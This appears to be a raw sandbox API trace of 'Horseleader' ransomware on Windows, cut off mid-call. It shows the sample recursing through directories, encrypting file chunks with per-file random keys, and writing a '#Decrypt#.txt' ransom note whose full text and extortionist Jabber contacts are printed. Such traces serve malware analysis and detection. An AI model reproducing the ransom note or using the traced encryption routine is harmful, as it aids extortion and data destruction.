b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0234.318] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0234.318] CloseHandle (hObject=0x158) returned 1 [0234.318] GetProcessHeap () returned 0x780000 [0234.318] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0234.318] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0234.318] lstrcmpiW (lpString1="zh-TW", lpString2="Windows") returned 1 [0234.318] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW") returned 60 [0234.318] lstrcmpW (lpString1="zh-TW", lpString2=".") returned 1 [0234.318] lstrcmpW (lpString1="zh-TW", lpString2="..") returned 1 [0234.318] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0234.318] GetProcessHeap () returned 0x780000 [0234.318] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0234.318] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW\\*") returned 62 [0234.319] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0234.319] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0234.319] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW\\.") returned 62 [0234.319] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0234.319] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0234.319] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0234.319] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW\\..") returned 63 [0234.319] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0234.319] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0234.319] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe268a454, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe287960d, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe287960d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0234.319] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0234.320] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW\\tipresx.dll.mui") returned 76 [0234.320] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0234.320] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0234.320] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0234.320] lstrlenW (lpString=".testttjffg") returned 11 [0234.320] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0234.320] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0234.320] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0234.320] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-tw\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.320] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe268a454, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe287960d, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe287960d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0234.320] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0234.321] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW\\#Decrypt#.txt") returned 74 [0234.321] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-tw\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0234.321] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0234.321] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0234.322] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0234.323] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0234.323] CloseHandle (hObject=0x158) returned 1 [0234.323] GetProcessHeap () returned 0x780000 [0234.323] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0234.323] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0234.323] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0234.323] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\#Decrypt#.txt") returned 68 [0234.323] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0234.324] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0234.324] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0234.325] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0234.325] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0234.325] CloseHandle (hObject=0x21c) returned 1 [0234.326] GetProcessHeap () returned 0x780000 [0234.326] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0234.326] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69dc9750, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="MSClientDataMgr", cAlternateFileName="MSCLIE~1")) returned 1 [0234.326] lstrcmpiW (lpString1="MSClientDataMgr", lpString2="Windows") returned -1 [0234.326] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr") returned 66 [0234.326] lstrcmpW (lpString1="MSClientDataMgr", lpString2=".") returned 1 [0234.326] lstrcmpW (lpString1="MSClientDataMgr", lpString2="..") returned 1 [0234.326] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0234.326] GetProcessHeap () returned 0x780000 [0234.326] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0234.326] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\*") returned 68 [0234.326] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69dc9750, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0234.327] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0234.327] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\.") returned 68 [0234.327] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0234.327] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69dc9750, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0234.328] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0234.328] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\..") returned 69 [0234.328] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0234.328] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0234.328] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad59fd00, ftCreationTime.dwHighDateTime=0x1ca9454, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xad59fd00, ftLastWriteTime.dwHighDateTime=0x1ca9454, nFileSizeHigh=0x0, nFileSizeLow=0x665a0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MSCDM.DLL", cAlternateFileName="")) returned 1 [0234.328] lstrcmpiW (lpString1="MSCDM.DLL", lpString2="Windows") returned -1 [0234.328] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned 76 [0234.328] StrStrIW (lpFirst="MSCDM.DLL", lpSrch=".horseleader") returned 0x0 [0234.328] lstrcmpW (lpString1="MSCDM.DLL", lpString2="#Decrypt#.txt") returned 1 [0234.328] lstrcmpW (lpString1="MSCDM.DLL", lpString2="_uninstalling_.png") returned 1 [0234.328] lstrlenW (lpString=".testttjffg") returned 11 [0234.328] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL", lpSrch=".testttjffg") returned 0x0 [0234.328] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.328] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.328] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\msclientdatamgr\\mscdm.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0234.329] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned 76 [0234.329] StrStrW (lpFirst="MSCDM.DLL", lpSrch=".txt") returned 0x0 [0234.329] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=419232) returned 1 [0234.329] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.329] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0234.355] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0234.356] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0234.356] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x30ad0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.356] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0234.417] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0234.417] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0234.418] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x615a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.418] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0234.452] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0234.452] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0234.452] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.452] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0234.452] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, 